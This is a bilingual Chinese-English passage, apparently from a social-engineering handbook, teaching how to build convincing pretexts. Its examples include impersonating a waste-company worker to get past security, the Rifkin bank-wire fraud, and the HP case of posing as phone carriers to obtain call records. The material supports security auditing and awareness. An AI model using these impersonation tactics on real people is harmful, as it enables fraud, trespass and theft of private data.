手机是社会工程师的致命工具;养成使用手机的习惯并完全尊重手机将增强任何社会工程师的借口工具集。由于手机是如此致命的工具并且尚未失去其效力,因此在任何社会工程工作中,您都应该为它投入应有的时间和精力。

The phone is a deadly tool for social engineers; developing the habits to practice using it and to treat it with utter respect will enhance any social engineer’s toolset for pretexting. Because the phone is such a deadly tool and has not lost its effectiveness, you should give it the time and effort it deserves in any social engineering gig.

 

借口越简单,成功的机会就越大

The Simpler the Pretext, the Better the Chance of Success

 

“越简单越好”的原则怎么强调都不为过。如果借口包含太多复杂的细节,以至于忘记任何一个细节都会导致社会工程失败,那么它很可能会失败。保持故事情节、事实和细节简单有助于建立可信度。

“The simpler, the better” principle just can’t be overstated. If the pretext has so many intricate details that forgetting one will cause a social engineering failure, it is probably going to fail. Keeping the story lines, facts, and details simple can help build credibility.

 

保罗·艾克曼博士是一位著名的心理学家,也是人类欺骗领域的研究员,他在 1993 年合著了一篇题为《失败的谎言》的文章。在那篇文章中,他说

Dr. Paul Ekman, a renowned psychologist and researcher in the field of human deception, cowrote an article in 1993 entitled, “Lies That Fail.” In that article he says

 

[t] 并不总是有时间准备要说的台词,排练和记住它。即使事先有充足的通知,并精心设计了虚假的台词,说谎者也可能不够聪明,无法预料到所有可能被问到的问题,也无法想清楚他的答案应该是什么。即使聪明也不够,因为看不见的情况变化可能会暴露出原本有效的台词。而且,即使说谎者没有被环境迫使改变台词,一些说谎者也难以回忆起他们之前承诺的台词,因此无法快速一致地回答新问题。

[t]here is not always time to prepare the line to be taken, to rehearse and memorize it. Even when there has been ample advance notice, and a false line has been carefully devised, the liar may not be clever enough to anticipate all the questions that may be asked, and to have thought through what his answers must be. Even cleverness may not be enough, for unseen changes in circumstances can betray an otherwise effective line. And, even when a liar is not forced by circumstances to change lines, some liars have trouble recalling the line they have previously committed themselves to, so that new questions cannot be consistently answered quickly.

 

这个非常突出的观点清楚地解释了为什么简单更好。如果借口太复杂,以至于一个简单的错误就可能让你的掩护暴露,那么试图记住一个借口几乎是不可能的。借口应该自然流畅。它应该很容易记住,如果你觉得它很自然,那么回忆以前在借口中使用过的事实或台词就不是一件难事了。

This very salient point explains clearly why simple is better. Trying to remember a pretext can be almost impossible if it is so complex that your cover can be blown by a simple mistake. The pretext should be natural and smooth. It should be easy to remember, and if it feels natural to you, then recalling facts or lines used previously in the pretext will not be a task.

 

为了说明记住小细节的重要性,我想和大家分享一个故事。有一次我尝试做销售。我被安排和一位销售经理学习销售技巧。我还记得第一次和他通电话。我们开车去了他家,下车前他看了看信息卡,告诉我:“记住,贝基·史密斯寄来了一张补充保险申请卡。我们将提供 XYZ 保险单。观察并学习。”

To illustrate how important it is to remember the small details I want to share a story with you. Once upon a time I tried my hand at sales. I was placed with a sales manager to learn the ropes. I can recall my first call with him. We drove up to the house, and before we left the car he looked at the info card and told me, “Remember, Becky Smith sent in a request card for supplemental insurance. We will present the XYZ policy. Watch and learn.”

 

在推销电话的前三分钟,他叫她贝丝和贝蒂。每次他叫错名字时,我都看到她的态度发生变化,然后她会轻声说“贝基”。我觉得我们可能在赠送金条,而她会拒绝。她很反感他叫错她的名字,所以她对听任何东西都不感兴趣。

In the first three minutes of the sales call he called her Beth and Betty. Each time he used the wrong name I saw her demeanor change and then she would say quietly, “Becky.” I feel we could have been giving away gold bullion and she would have said no. She was so turned off that he couldn’t get her name right that she was not interested in listening to anything.

 

这个场景确实让我们深刻认识到保持简单事实的重要性。

This scenario really drives home the point of keeping the simple facts straight.

 

除了记住事实之外,同样重要的是要保持细节简洁。简单的借口可以让故事发展,目标可以发挥想象力来填补空白。不要试图让借口变得复杂,最重要的是,记住那些微小的细节,这些细节会对人们对借口的看法产生影响。

In addition to remembering the facts, it is equally important to keep the details small. A simple pretext allows for the story to grow and the target to use their imagination to fill the gaps. Do not try to make the pretext elaborate, and above all, remember the tiny details that will make the difference in how people view the pretext.

 

另一方面,这里有一个有趣的小道消息:著名罪犯和骗子常用的一种策略是故意犯一些错误。他们认为“人无完人”,犯一些错误会让人感到自在。如果你使用这种策略,要谨慎选择犯什么类型的错误,因为它确实会增加借口的复杂性,但确实会让对话看起来更自然。谨慎使用这个技巧,无论你决定如何进行,都要保持简单。

On the other hand, here is an interesting tidbit: A popular tactic used by famous criminals and con men is to purposely make a few mistakes. The thought is that “no one is perfect,” and a few mistakes make people feel at home. Be cautious with what types of mistakes you decide to make if you employ this tactic because it does add complexity to your pretext, but it does make the conversation seem more natural. Use this tip sparingly, however you decide to proceed, keep it simple.

 

让我将所有这些与我在审计中使用过或见过的几个例子联系起来。在电话中进行了一番出色的诱导后,一位匿名的社会工程师得到了垃圾清理公司的名称。经过几次简单的互联网搜索,他得到了一个可用且可打印的徽标。有数十家本地和在线商店会打印带有徽标的衬衫或帽子。

Let me tie all this together with a few examples that I have used or seen used in audits. After some excellent elicitation on the phone, a nameless social engineer had been given the name of the waste removal company. A few simple Internet searches and he had a usable and printable logo. There are dozens of local and online shops that will print shirts or hats with a logo on it.

 

他花了几分钟在模板上调整好东西,然后订购了一件印有这家垃圾处理公司标志的衬衫和棒球帽。几天后,这位社会工程师穿着印有标志的衣服,拿着一个剪贴板,来到目标公司的保安亭。

A few minutes of aligning things on a template and he ordered a shirt and ball cap with the logo of the waste company on it. A couple days later, wearing the logo-laden clothing and carrying a clipboard, the social engineer approached the security booth of the target company.

 

他说:“你好,我是 ABC 废物公司的乔。我们接到你们采购部的电话,要求派人过来检查后面损坏的垃圾箱。明天会去取货,如果垃圾箱无法修复,我会让他们拿来一个新的。但我需要跑回去检查一下。”

He said, “Hi, I’m Joe with ABC Waste. We got a call from your purchasing department asking to send someone over to check out a damaged dumpster in the back. The pickup is tomorrow and if the dumpster isn’t repairable I will have them bring out a new one. But I need to run back there and inspect it.”

 

保安人员毫不犹豫地说:“好的,你需要这个徽章才能进入现场。只需从这里经过,然后绕到后面,你就会看到那里的垃圾箱。”

Without blinking, the security officer said, “OK, you will need this badge to get onsite. Just pull through here and drive around the back and you will see the dumpsters there.”

 

这位社会工程师可以自由地进行一次非常漫长而详细的垃圾桶搜查,但他想最大限度地发挥自己的潜力,所以他用这句话来一击致命。他一边看着自己的剪贴板,一边说:“纸条上说这不是食物垃圾箱,而是放纸张或技术垃圾的垃圾箱。这些垃圾在哪个街区?”

The social engineer had a free pass to perform a very long and detailed dumpster dive but wanted to maximize his potential so went in for the kill with this line. While looking at his clipboard he said, “The note says it is not the food dumpsters but one of the ones where paper or tech trash goes. Which block are those in?”

 

“哦,按照我告诉你的路开,他们在第三个停车位,”保安回答道。

“Oh, just drive the same way I told you and they are in the third bay,” replied the security guard.

 

“谢谢,”乔说。

“Thanks,” said Joe.

 

一个简单的借口,辅以服装和“工具”(如剪贴板),故事情节简单易记,并不复杂。简单和缺乏细节实际上使这个借口更可信,而且它奏效了。

A simple pretext, backed up by clothing and “tools” (like the clipboard), and the storylines were simple to remember and not complex. The simplicity and lack of detail actually made this pretext more believable, and it worked.

 

另一个非常常用的借口是技术支持人员。这只需要一件 Polo 衫、一条卡其裤和一个小型电脑工具包。许多社会工程师采用这种策略从前门进入,因为“技术人员”通常可以在无人监督的情况下访问所有东西。同样的规则适用:保持故事情节简单将有助于使这个特定的借口非常真实和可信。

Another very widely used pretext is that of the tech support guy. This one only requires a polo shirt, pair of khakis, and small computer tool bag. Many social engineers employ this tactic to get in the front door because the “tech guy” is usually given access to everything without supervision. The same rules apply: keeping the storyline simple will help make this particular pretext very real and believable.

 

借口应该显得自然

The Pretext Should Appear Spontaneous

 

让借口显得自然,这又回到了我关于使用大纲与使用脚本的观点。大纲总是会给社会工程师更多的自由,而脚本会让社会工程师听起来太机械化。这也与使用社会工程师个人感兴趣的项目或故事有关。如果每次有人问你一个问题或说一个需要你思考的陈述,你都会说“嗯”并开始深入思考,但你无法给出一个明智的答案,这将破坏你的信誉。当然,很多人在说话前会思考,所以这不是在一秒钟内得到答案,而是要有答案或没有答案的理由。例如,在一次电话中,我被要求提供一条我没有的信息。我只是说,“让我去拿。”然后我俯身,听起来像是在喊同事:“吉尔,你能请比尔给我一份 XYZ 账户的订单吗?谢谢。”

Making the pretext appear spontaneous goes back to my point on using an outline versus using script. Outlines will always allow the social engineer more freedom and a script will make the social engineer sound too robotic. It also ties in to using items or stories that interest the social engineer personally. If every time someone asks you a question or makes a statement that requires you to think, and you go, “Ummmm” and start to think deeply, and you cannot come back with an intelligent answer, it will ruin your credibility. Of course many people think before they speak, so this is not about having the answer in one second, but about having an answer or a reason for not having the answer. For example, in one phone call I was asked for a piece of information I didn’t have. I simply said, “Let me get that.” I then leaned over and made it sound like I was yelling for a workmate: “Jill, can you please ask Bill to give me the order form for the XYZ account? Thanks.”

 

然后,当“吉尔”帮我拿到论文时,我能够获得我需要的数据,并且这篇论文再也没有被提起。

Then as “Jill” was getting the paper for me I was able to obtain the data I needed and the paper was never brought up again.

 

我整理了一份清单,列出了一些可以帮助你变得更自发的方法:

I have compiled a small list of ways that you can work on being more spontaneous:

 
 
     
  • 不要考虑你的感受。这一点很好,因为如果你过度思考,你通常会开始将情绪混入其中,这会导致恐惧、紧张或焦虑,所有这些都会导致失败。另一方面,你可能不会感到紧张或恐惧,而是过度兴奋,这也会导致你犯很多错误。
  • Don’t think about how you feel. This point is a good one, because often in a pretext if you overthink you will start to add emotion into the mix, which can cause fear, nervousness, or anxiety, all of which lead to failure. On the other hand, you might not experience nervousness or fear, but over-excitement, which can also cause you to make a lot of mistakes.
  •  
     
  • 不要太严肃地对待自己。当然,这是生活中的一个很好的建议,但它也非常适用于社会工程。作为一名安全专业人员,你的工作很严肃;这是一件严肃的事情。但是,如果你不能嘲笑自己的错误,你可能会沉默不语或过于紧张,无法处理道路上的小挫折。我并不是建议你把安全当作一个笑话。然而,在你的脑海里,如果你把潜在的失败视为你生活中失败的顶峰,你创造的压力可能会导致你最害怕的事情。如果你有能力接受它,小失败往往可以带来更大的成功。
  • Don’t take yourself too seriously. Of course, this is great advice in life, but it applies wonderfully to social engineering. As a security professional you have a serious job; this is a serious matter. But if you’re not able to laugh at your mistakes, you may clam up or get too nervous to handle a small bump in the road. I am not suggesting you take security as a joke. In your mind, though, if you view a potential failure as the pinnacle of failure in your life, the pressure you create can cause just what you fear the most. Minor failures can often lead to greater success if you have the ability to roll with it.
  •  
     
  • 学会识别相关内容。我喜欢将这个概念表述为“走出你的头脑,走进世界”,这是更好的建议。社会工程师可能会试图提前三步制定计划,同时错过可能导致借口失败的重要细节。快速识别您周围的相关材料和信息,无论是目标的肢体语言、所说的话还是微表情(有关此主题的更多信息,请参阅第 5 章),并将信息融入攻击媒介。
  • Learn to identify what is relevant. I like to phrase this concept as, “Get out of your head and into the world,” which is more great advice. A social engineer may be trying to plan three steps ahead and in the meantime miss a vital detail that can cause the pretext to fall apart. Be quick to identify the relevant material and information around you, whether it is the target’s body language, words spoken, or microexpressions (see Chapter 5 for more on this topic), and assimilate the information into the attack vector.
  •  
 

还要记住,人们能察觉到别人是否真的在听他们说话。感觉即使是不重要的句子也被置若罔闻,对很多人来说,这可能是一种极大的反感。每个人都经历过与某个似乎不在乎自己在说什么的人在一起。也许那个人甚至有正当的理由去思考不同的道路,但这样做仍然令人反感。

Also keep in mind that people can tell when someone isn’t really listening to what they are saying. Getting the feeling that even unimportant sentences are falling on deaf ears can be a massive turnoff for many people. Everyone has experienced being with someone who just didn’t seem to care what he or she is saying. Maybe that person even had a legitimate reason to be thinking on a different path, but doing it is still a turnoff.

 

一定要听你的目标说了什么。仔细听,你就会发现对他们来说非常重要的细节,同时,你可能会听到一些有助于你成功的东西。
 
     
  • 努力积累经验。这个概念可以追溯到本书中重复了四百万次的内容——实践。通过实践获得经验可以成就或毁掉借口。与家人、朋友和陌生人练习自发性,完全没有目标,只是自发。与人交谈,但不要像可怕的跟踪狂那样——简单的小对话可以让你感到自在。
  •  
 

Be sure to listen to what your target is saying. Pay close attention and you will pick up the details that are very important to them and in the meantime, you might hear something to help you in your success.
 
     
  • Seek to gain experience. This concept goes back to what you will probably see repeated four million times in this book—practice. Gaining experience through practice can make or break the pretext. Practice spontaneity with family and friends and total strangers with absolutely no goal in mind but to be spontaneous. Strike up conversations with people, but not in a scary stalker kind of way—simple little conversations can go a long way toward making you feel comfortable being spontaneous.
  •  
 

 

这些要点绝对可以让社会工程师在借口方面占上风。能够表现出自发性是一种天赋。在本章前面,我提到了对 Tom Mischke 的采访,他对自发性有有趣的看法。他说他想给人一种包裹在练习和准备中的自发性的假象。他会练习很多次,以至于他的借口会显得是自发的幽默和才华。

These points can definitely give a social engineer the upper hand when it comes to pretexting. Having the ability to appear spontaneous is a gift. Earlier in this chapter I mentioned my interview with Tom Mischke, who had an interesting take on spontaneity. He said he wants to give the illusion of spontaneity wrapped in practice and preparation. He would practice so much that his pretext would come out as a spontaneous generation of humor and talent.

 

为目标提供合理的结论或后续行动

Provide a Logical Conclusion or Follow-through for the Target

 

不管你信不信,人们都希望被告知该做什么。想象一下,如果你去看医生,他走进来,给你做了检查,在病历上写了一些东西,然后说:“好的,一个月后再见。”这是不可接受的。即使是坏消息,人们也希望被告知下一步该怎么做。

Believe it or not people want to be told what to do. Imagine if you went to a doctor and he walked in, checked you over, wrote some things on his chart, and said, “Okay; see you in a month.” That would be unacceptable. Even in the event of bad news, people want to be told the next step and what to do.

 

作为一名社会工程师,当你离开目标时,你可能需要他采取或不采取行动,或者你可能已经得到了你想要的东西,只需要离开。无论哪种情况,给目标一个结论或后续行动都会填补目标的预期空白。

As a social engineer, when you leave the target, you may need him to take or not take an action, or you may have gotten what you came for and just need to leave. Whatever the circumstance, giving the target a conclusion or follow-through fills in the expected gaps for the target.

 

就像医生给你做了体检,然后让你回家,没有任何指导一样,如果你以技术支持人员的身份进入设施,在克隆数据库后不说任何话就走了,那么每个人都会疑惑到底发生了什么。有人甚至会打电话给“技术支持公司”,询问他是否需要做些什么,或者最糟糕的情况是,你只是让工作人员疑惑不解。无论哪种情况,让每个人都等着都不是离开的方式。即使是简单的一句“我检查了服务器并修复了文件系统;你应该会看到未来几天速度提高 22%”,也会让目标客户感觉他们“物有所值”。

Just as if a doctor checked you over and sent you home with no directions, if you engineer your way into a facility as a tech support guy and just walk out without saying anything to anyone after cloning the database, you leave everyone wondering what happened. Someone may even call the “tech support company” and ask whether he needed to do anything, or at worst you just leave the workers wondering. Either way, leaving everyone hanging is not the way to leave. Even a simple, “I checked over the servers and repaired the file system; you should see a 22% increase in speed over the next couple days,” leaves the targets feeling as if they “got their money’s worth.”

 

对于社会工程师来说,最棘手的部分是让目标在他或她离开后采取行动。如果该行动对于完成社会工程师审计至关重要,那么你可能想亲自承担这个角色。例如,在第 3 章中,我讲述了我在商会活动上收集信息的过程,如果我希望目标通过电子邮件跟进我,我可以说:“这是我的名片;你能在星期一给我发一些关于 XYZ 的详细信息吗?”他很可能会这样做,或者他可能会去办公室,完全忘记我,整个工作就会失败。更好的说法是:“我很想从你那里得到更多信息。星期一我可以给你打电话或发电子邮件给你,以了解更多详细信息吗?”

The tricky part for a social engineer is getting the target to take an action after he or she is gone. If the action is vital for completion of the social engineer audit, then you may want to take that role upon yourself. For example, in the account in Chapter 3 of my information-gathering session at the chamber of commerce event, if I wanted that target to follow-up with me through email I could have said, “Here is my card; will you email me some details on Monday about XYZ?” He very well may have, or he could have gone to the office, forgotten about me completely, and the whole gig would have failed. What would be better is to say, “I would love to get some more information from you. On Monday could I perhaps call you or shoot you an email to get some more details?”

 

你提出的请求也应该与借口相符。如果你的借口是技术支持人员,你不会“命令”人们必须做什么和不能做什么;你是为他们工作的。如果你是 UPS 送货员,你不会要求进入服务器机房。

The requests you make should match the pretext, too. If your pretext is being a tech support guy, you won’t “order” people around with what they must and must not do; you work for them. If you are a UPS delivery person, you don’t demand access to the server room.

 

如前所述,完善借口可能还有更多步骤,但本章列出的步骤可以为社会工程师构建完全可信的借口提供坚实的基础。

As mentioned earlier, more steps may exist for perfecting a pretext, but the ones listed in this chapter can give a social engineer a solid foundation to build a perfectly believable pretext.

 

你可能会问,“好吧,你列出了所有这些原则,但现在该怎么办?”社会工程师如何才能建立一个经过充分研究、可信、听起来自然、简单的借口,既可以在电话中也可以在面对面的情况下发挥作用,并取得预期的结果?请继续阅读。

You might be asking, “Okay, so you listed all these principles, but now what?” How can a social engineer build a well-researched, believable, spontaneous-sounding, simple pretext that can work either on the phone or in person and get the desired results? Read on.

 

成功的借口

Successful Pretexting

 

要了解如何建立一个成功的借口,请看几个社会工程师使用有效借口的故事,以及他们如何开发这些借口。最终他们确实被抓住了,这就是这些故事现在公开的原因。

To learn how to build a successful pretext, take a look at a couple of stories of social engineers who used pretexts that worked and how they developed them. Eventually they did get caught, which is why these stories are now available.

 

示例 1:斯坦利·马克·里夫金

Example 1: Stanley Mark Rifkin

 

斯坦利·马克·里夫金 (Stanley Mark Rifkin) 是美国历史上最大的银行抢劫案之一(有关他的精彩文章,请访问www.social-engineer.org/wiki/archives/Hackers/hackers-Mark-Rifkin-Social-Engineer-furtherInfo.htm)。里夫金是一名计算机爱好者,他在自己的小公寓里经营着一家计算机咨询公司。他的一个客户是一家为安全太平洋银行 (Security Pacific Bank) 提供计算机服务的公司。位于洛杉矶的 55 层安全太平洋国家银行总部看起来像一座花岗岩和玻璃堡垒。身着深色西装的警卫在大厅里巡逻,隐藏的摄像机拍摄客户存款和取款的情况。

Stanley Mark Rifkin is credited with one of the biggest bank heists in American history (see a great article about him at www.social-engineer.org/wiki/archives/Hackers/hackers-Mark-Rifkin-Social-Engineer-furtherInfo.htm). Rifkin was a computer geek who ran a computer consulting business out of his small apartment. One of his clients was a company that serviced the computers at Security Pacific Bank. The 55-floor Security Pacific National Bank headquarters in Los Angeles looked like a granite-and-glass fortress. Dark-suited guards roamed the lobby and hidden cameras photographed customers as they made deposits and withdrawals.

 

这座建筑似乎坚不可摧,那么里夫金是如何带着 1020 万美元离开的,并且没有拿枪,没有碰过一美元,也没有抢劫任何人呢?

This building seemed impenetrable, so how is it that Rifkin walked away with $10.2 million and never held a gun, never touched a dollar, and never held up anyone?

 

该银行的电汇政策似乎很安全。他们通过一个数字代码授权,该代码每天都会变化,并且只提供给授权人员。它被张贴在一个只有“授权人员”才能进入的安全房间的墙上。

The bank’s wire transfer policies seemed secure. They were authorized by a numerical code that changed daily and was only given out to authorized personnel. It was posted on a wall in a secure room that only “authorized personnel” had access to.

 

摘自前面提到的存档文章:

From the archived article mentioned previously:

 

1978 年 10 月,他来到太平洋安全银行,银行职员很容易就认出他是一名计算机工作人员。他乘电梯来到银行电汇室所在的 D 层。他是个和蔼可亲的年轻人,设法说​​服对方进入银行的电汇室,银行的秘密密码就贴在墙上。里夫金记住了密码,没有引起怀疑就离开了。

In October 1978, he visited Security Pacific, where bank employees easily recognized him as a computer worker. He took an elevator to the D-level, where the bank’s wire transfer room was located. A pleasant and friendly young man, he managed to talk his way into the room where the bank’s secret code-of-the-day was posted on the wall. Rifkin memorized the code and left without arousing suspicion.

 

不久,转帐室的银行员工接到一名男子打来的电话,该男子自称是银行国际部的员工迈克·汉森。该男子下令将资金例行转入纽约欧文信托公司的一个账户,并提供了授权交易的密码。这次转账似乎没有什么异常,安全太平洋将钱转入了纽约银行。银行官员不知道的是,自称迈克·汉森的人实际上是斯坦利·里夫金,他利用银行的安全密码抢劫了银行 1020 万美元。

Soon, bank employees in the transfer room received a phone call from a man who identified himself as Mike Hansen, an employee of the bank’s international division. The man ordered a routine transfer of funds into an account at the Irving Trust Company in New York—and he provided the secret code numbers to authorize the transaction. Nothing about the transfer appeared to be out of the ordinary, and Security Pacific transferred the money to the New York bank. What bank officials did not know was that the man who called himself Mike Hansen was in fact Stanley Rifkin, and he had used the bank’s security code to rob the bank of $10.2 million.

 

这个场景有很多值得讨论的地方,但现在,我们先关注一下借口。想想他必须做的事情的细节:

This scenario offers much to talk about, but for now, focus on the pretext. Think about the details of what he had to do:

 
 
     
  • 他必须充满信心、感到舒适,以免引起人们对他待在那个房间里的怀疑。
  • He had to be confident and comfortable in order to not raise suspicion for being in that room.
  •  
     
  • 当他打电话进行转帐时,他必须有一个令人信服的故事,并有详细信息来支持他的故事。
  • He had to have a believable story when he called to do the transfer and have the details to back up his story.
  •  
     
  • 他必须足够自发地顺应可能出现的问题。
  • He had to be spontaneous enough to go with the flow with questions that might have come up.
  •  
     
  • 他还必须表现得足够圆滑,以免引起怀疑。
  • He had to also be smooth enough to not raise suspicion.
  •  
 

这个借口必须经过精心策划,经过深思熟虑。直到他拜访了一位前同事,他的借口才失败,他被抓住了。当他被抓时,认识他的人都感到惊讶,有些人甚至说:“他不可能是小偷;每个人都喜欢马克。”

This pretext had to be meticulously planned out with the utmost detail being thought through. It wasn’t until he visited a former associate that his pretext failed, and he was caught. When he was caught, people who knew him were amazed and some even said things like, “There is no way he is a thief; everyone loves Mark.”

 

显然,他的借口很充分。他有一个深思熟虑的计划,人们可以猜到,他有一个经过精心排练的计划。他知道自己要做什么,而且他完美地扮演了这个角色。当他面对陌生人时,他能够扮演这个角色;他的失败发生在他与一位认识他的同事在一起时,那位同事看到了一则新闻,然后把两者联系起来,举报了马克。

Obviously his pretext was solid. He had a well-thought-out, and one would guess, well-rehearsed plan. He knew what he was there to do and he played the part perfectly. When he was in front of strangers he was able to play the part; his downfall came when he was with a colleague who knew him, and that colleague saw a news story then put two and two together and turned Mark in.

 

令人惊讶的是,在保释期间,里夫金开始用同样的手段攻击另一家银行,但被政府内奸陷害;他被抓获并在联邦监狱服刑八年。虽然马克是个“坏人”,但你可以从他的故事中学到很多关于借口的知识。他把事情说得很简单,用他熟悉的东西来构建一个好的故事情节。

Amazingly enough, while out on bail, Rifkin began to target another bank using the same scheme, but a government mole had set him up; he got caught and spent eight years in federal prison. Although Mark is a “bad guy” you can learn much about pretexting from reading his story. He kept it very simple and used the things that were familiar to him to build a good storyline.

 

马克的计划是窃取这些钱,并将其变成无法追踪的商品:钻石。要做到这一点,他首先需要成为一名银行职员来窃取这些钱,然后成为一名主要的钻石买家来出售这些现金,最后出售这些钻石,以便将可用的、无法追踪的现金装进自己的口袋。

Mark’s plan was to steal the money and turn it into an untraceable commodity: diamonds. To do so he would first need to be a bank employee to steal the money, then a major diamond buyer to unload the cash, and finally sell the diamonds to have usable, untraceable cash in his pocket.

 

虽然他的伪装不需要精心打扮或说话方式,但他必须先扮演银行职员,然后是钻石大买家,最后是钻石卖家。在这场戏里,他可能换了三、四、五次角色,而且演得非常好,几乎骗过了所有人。

Although his pretext did not involve elaborate costumes or speech patterns he had to play the part of a bank employee, then major diamond buyer, then play the part of a diamond seller. He changed roles maybe three, four, or five times in this gig and was able to do it well enough to fool almost everyone.

 

马克知道他的目标是谁,并按照前面概述的所有原则处理这种情况。当然,我们不能宽恕他所做的事,但他的伪装才能令人钦佩。如果他能充分发挥自己的才能,他可能会成为一名伟大的公众人物、销售人员或演员。

Mark knew who his targets were and approached the scenario with all the principles outlined earlier. Of course, one can’t condone what he did, but his pretexting talents are admirable. If he put his talents to good use he would probably make a great public figure, salesperson, or actor.

 

示例 2:惠普

Example 2: Hewlett-Packard

 

2006 年,《新闻周刊》发表了一篇非常有趣的文章 ( www.social-engineer.org/resources/book/HP_pretext.htm )。基本上,惠普董事长 Patricia Dunn 聘请了一支安全专家团队,该团队又聘请了一支私人调查员团队,他们以借口获取电话记录。这些受雇的专业人士实际上进入了惠普,并扮演了惠普董事会成员和部分媒体人员的角色。所有这些都是为了揭露惠普内部所谓的信息泄露。

In 2006 Newsweek published a very interesting article (www.social-engineer.org/resources/book/HP_pretext.htm). Basically, HP’s chairwoman, Patricia Dunn, hired a team of security specialists who hired a team of private investigators who used pretexting to obtain phone records. These hired professionals actually got in and played the roles of HP board members and parts of the press. All of this was done to uncover a supposed information leak within the ranks at HP.

 

Dunn 女士希望获得董事会成员和记者的电话记录(不是 HP 设施的记录,而是这些人的私人住宅和手机记录),以核实她认为的泄密地点。《新闻周刊》文章指出:

Ms. Dunn wanted to obtain the phone records of board members and reporters (not the records from the HP facilities, but the personal home and cell phone records of these people) to verify where she supposed the leak was. The Newsweek article states:

 

5 月 18 日,在加利福尼亚州帕洛阿尔托的 HP 总部,邓恩向董事会爆料:她已经找到泄密者。据当时在场的 HP 董事汤姆·珀金斯 (Tom Perkins) 称,邓恩阐述了监控计划,并指出了泄密者,该董事承认自己就是 CNET 泄密者。该董事的身份尚未公开披露,他已道了歉。但随后他又对其他董事说:“我会告诉你们所有事情。你们为什么不直接问呢?”珀金斯称,随后该董事被要求离开会议室,他照做了。

On May 18, at HP headquarters in Palo Alto, California, Dunn sprung her bombshell on the board: She had found the leaker. According to Tom Perkins, an HP director who was present, Dunn laid out the surveillance scheme and pointed out the offending director, who acknowledged being the CNET leaker. That director, whose identity has not yet been publicly disclosed, apologized. But the director then said to fellow directors, “I would have told you all about this. Why didn’t you just ask?” That director was then asked to leave the boardroom, and did so, according to Perkins.

 

这个帐户值得注意的是接下来提到的有关借口的话题:

What is notable about this account is what is next mentioned about the topic of pretexting:

 

惠普案还特别揭露了安全顾问获取个人信息的可疑手段。惠普在其外部法律顾问发给珀金斯的内部电子邮件中承认,它通过一种有争议的做法“借口”获得了将这位泄密者与 CNET 联系起来所需的书面记录;《新闻周刊》获得了该电子邮件的副本。根据联邦贸易委员会的说法,这种做法涉及使用“虚假借口”来获取他人的个人非公开信息:电话记录、银行和信用卡账户号码、社会安全号码等。

The HP case specifically also sheds another spotlight on the questionable tactics used by security consultants to obtain personal information. HP acknowledged in an internal e-mail sent from its outside counsel to Perkins that it got the paper trail it needed to link the director-leaker to CNET through a controversial practice called “pretexting”; Newsweek obtained a copy of that e-mail. That practice, according to the Federal Trade Commission, involves using “false pretenses” to get another individual’s personal nonpublic information: telephone records, bank and credit-card account numbers, Social Security numbers and the like.

 

通常情况下,以电话公司为例,借口者会打电话谎称自己是客户;由于公司很少需要密码,借口者可能只需要家庭住址、帐号和诚恳的请求就能获得账户详细信息。根据联邦贸易委员会网站,借口者将信息出售给个人,这些人可能是合法的私人调查员、金融贷款人、潜在诉讼当事人和可疑配偶,也可能是那些可能试图窃取资产或欺诈性获取信贷的人。联邦贸易委员会网站称,借口“是违法的”。联邦贸易委员会和几个州检察长已对借口者提起执法行动,指控他们违反了联邦和州有关欺诈、虚假陈述和不正当竞争的法律。惠普的董事之一是 Verizon 总裁 Larry Babbio,该公司已对借口者提起了各种诉讼。

Typically—say in the case of a phone company—pretexters call up and falsely represent themselves as the customer; since companies rarely require passwords, a pretexter may need no more than a home address, account number, and heartfelt plea to get the details of an account. According to the Federal Trade Commission’s Web site, pretexters sell the information to individuals who can range from otherwise legitimate private investigators, financial lenders, potential litigants, and suspicious spouses to those who might attempt to steal assets or fraudulently obtain credit. Pretexting, the FTC site states, “is against the law.” The FTC and several state attorneys general have brought enforcement actions against pretexters for allegedly violating federal and state laws on fraud, misrepresentation, and unfair competition. One of HP’s directors is Larry Babbio, the president of Verizon, which has filed various actions against pretexters.

 

(如果您有兴趣了解,可以在http://frwebgate.access.gpo.gov/cgi-bin/getdoc.cgi?dbname=109_cong_bills&docid=f:h4709enr.txt.pdf找到 2006 年电话记录和隐私保护法案。)

(If you’re interested in exploring it, the Telephone Records and Privacy Protection Act of 2006 can be found at http://frwebgate.access.gpo.gov/cgi-bin/getdoc.cgi?dbname=109_cong_bills&docid=f:h4709enr.txt.pdf.)

 

最终的结果是,不仅邓恩受到了刑事指控,她聘请的顾问也受到了刑事指控。你可能会想,“考虑到他们被雇佣并签约进行这些测试,这怎么可能呢?”

The end result was that criminal charges were brought not only against Dunn, but against the consultants she hired. You may wonder, “How is that possible considering they were hired and contracted to perform these tests?”

 

让我们看看他们使用了哪些途径以及他们获得了哪些信息来帮助回答这个问题。顾问们获得了惠普董事会成员和记者的姓名、地址、社会安全号码、电话通话记录、电话账单记录和其他信息。他们实际上使用社会安全号码为一名记者建立了一个在线账户,然后获取了他的个人通话记录。

Take a look at what avenues they used and what information they obtained to help answer this question. The consultants obtained the names, addresses, Social Security numbers, telephone call logs, telephone billing records, and other information of the HP board members and reporters. They actually used the Social Security number to establish an online account for one reporter and then obtain records of his personal calls.

 

惠普发给其律师和内部法律人员的一份机密文件(www.social-engineer.org/resources/book/20061004hewlett6.pdf)第 32 页列出了汤姆·珀金斯与惠普董事会成员的沟通内容,从中可以更深入地了解他们使用的借口。他们使用的几种策略如下:

Page 32 of a confidential document from Hewlett-Packard to its lawyer and internal legal staff (www.social-engineer.org/resources/book/20061004hewlett6.pdf) lists a communication from Tom Perkins to the HP board members that offers a little more insight about what pretexts were used. A few tactics used were:

 
 
     
  • 他们冒充运营商,非法获取通话记录。
  • They represented themselves as the carrier company to obtain the records of calls illegally.
  •  
     
  • 被调查者的身份被冒用,以获取他们的个人通话记录。
  • The identities of the ones being investigated were used and spoofed to obtain their personal call records.
  •  
     
  • 使用非法获取的姓名、社会安全号码和其他信息创建了运营商的在线账户,以访问他们的通话记录。
  • Online accounts with carriers were generated using illegally obtained names, Social Security numbers, and other information to access their call records.
  •  
 

2006 年 9 月 11 日,美国众议院能源和商业委员会向 Dunn 女士发出了一封信(该信的副本可在www.social-engineer.org/resources/book/20061004hewlett6.pdf上查看),要求她提供已获得的信息。他们在请求中列出了所获得的信息,如下所示:

On September 11, 2006, the United States House of Representatives Committee on Energy and Commerce sent Ms. Dunn a letter (see a copy of this letter at www.social-engineer.org/resources/book/20061004hewlett6.pdf) requesting the information she had obtained. They listed in their requests the obtained information as the following:

 
 
     
  • 所有已公布和未公布的电话号码
  • All published and non-published telephone numbers
  •  
     
  • 信用卡账单
  • Credit card bills
  •  
     
  • 客户姓名和地址信息
  • Customer name and address info
  •  
     
  • 水电费
  • Utility bills
  •  
     
